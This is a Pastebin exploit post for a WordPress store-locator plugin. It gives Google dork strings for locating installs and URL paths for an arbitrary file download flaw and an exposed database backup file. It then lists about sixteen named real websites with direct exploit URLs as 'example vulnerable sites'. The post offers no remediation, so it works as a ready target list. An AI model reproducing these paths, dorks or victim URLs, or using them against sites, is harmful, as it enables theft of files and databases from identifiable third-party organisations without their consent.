KingSkrupellos

WordPress CodeCanyon-5293356-Ajax-Store-Locator-Wordpress

Dec 10th, 2018
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.49 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress CodeCanyon-5293356-Ajax-Store-Locator-Wordpress Plugins 1.2.0 Multiple Vulnerabilities
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 10/12/2018
  6. # Vendor Homepage : wordpress.org ~ codecanyon.net/item/ajax-store-locator-v-20/4106209?s_rank=1
  7. + gizmocode.com ~ codecanyon.net/item/ajax-store-locator-wordpress/5293356
  8. # Software Download Link : codecanyon.net/user/gizmocode/portfolio
  9. # Software Price : 16$
  10. # More Information About Software :
  11. + themesinfo.com/wordpress-plugins/wordpress-codecanyon-5293356-ajax-store-locator-wordpress-plugin-dn4k
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Version Information : 1.2.0 and 2.0
  15. # Exploit Risk : Medium
  16. # Google Dorks : inurl:''/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/''
  17. + inurl:''/wp-content/plugins/ajax-store-locator-wordpress/''
  18. intext:''Powered By Gizmocode.com''
  19. intext:''Powered by New Age Media Web''
  20. intext:''2018 Agromaster Oy''
  21. intext:''Copyright © 2011-2014 Nationwide MRI. All Rights Reserved.''
  22. intext:''© 2015 by Palestra Digital''
  23. intext:''Copyright © 2018 TMUK GROUP LTD''
  24. intext:''Copyright 2018 Omnicor, Inc. | All Rights Reserved''
  25. intext:''Powered by WordPress | Theme Fusion''
  26. intext:''Tous droits réservés © 2018 Bfly.ca''
  27. intext:''Managed by Kjenmarks - Wordpress specialisten''
  28. intext:'' Site by Lucian Mitiu''
  29. intext:''Avaz Inc. © 2015 droits de reproduction réservés. Politique de confidentialité''
  30. intext:''realizacja: echomarketing.pl''
  31. intext:''COPYRIGHT 2018 PROQUIP GOLF''
  32. intext:''@2015 BAHAR AL-KUWAIT GROUP HOLDING COMPANY''
  33. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  34. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  35. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  36.  
  37. #################################################################################################
  38.  
  39. 1) Vulnerabilities includes ;
  40.  
  41. a) Arbitrary File Download Vulnerability
  42.  
  43. b) Database Backup Disclosure Vulnerability
  44.  
  45. #################################################################################################
  46.  
  47. Main Features of the Software =>
  48.  
  49. Directions to an searched location.
  50. Street view.
  51. Custom Info label for providing additional information.
  52. Social Sharing of searched locations (Facebook, Twitter and Pinterest).
  53. Configurable Layouts.
  54. Search and browse option.
  55. Category filtration of store locations.
  56. Manual plotting on map for addresses which Google doesn’t understand.
  57. Drawer panel for more map access.
  58. Guided Installation wizard and much more features.
  59.  
  60. #################################################################################################
  61.  
  62. # Admin Panel Login Path :
  63.  
  64. /wp-login.php
  65.  
  66. # Arbitrary File Download Exploit =>
  67.  
  68. /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[FİLENAMEHERE]
  69.  
  70. /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_import/......
  71.  
  72. /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/xcel_export/......
  73.  
  74. /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/xcel_import_result/......
  75.  
  76. # Database Backup Disclosure Exploit :
  77.  
  78. /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  79.  
  80. /wp-content/plugins/ajax-store-locator-wordpress/db_dump.sql
  81.  
  82. #################################################################################################
  83.  
  84. # Example Vulnerable Sites =>
  85.  
  86. [+] pilkemaster.fi/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  87.  
  88. [+] pilkemaster.fi/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[FILENAME]
  89.  
  90. [+] tmuk.org/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  91.  
  92. [+] wikkistix.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  93.  
  94. [+] kellogg-american.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  95.  
  96. [+] recargapr.com/web/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  97.  
  98. [+] nationwidemri.com/wp-content/plugins/ajax-store-locator-wordpress/db_dump.sql
  99.  
  100. [+] floralelement.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  101.  
  102. [+] theblinkserver.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  103.  
  104. [+] masjewelz.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  105.  
  106. [+] albahargroup.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  107.  
  108. [+] anokhi-collection.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  109.  
  110. [+] proquipgolf.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  111.  
  112. [+] avazapp.fr/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  113.  
  114. [+] beninca.pl/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  115.  
  116. [+] vintagetegels.nl/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
  117.  
  118. #################################################################################################
  119.  
  120. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  121.  
  122. #################################################################################################
Add Comment
Please, Sign In to add comment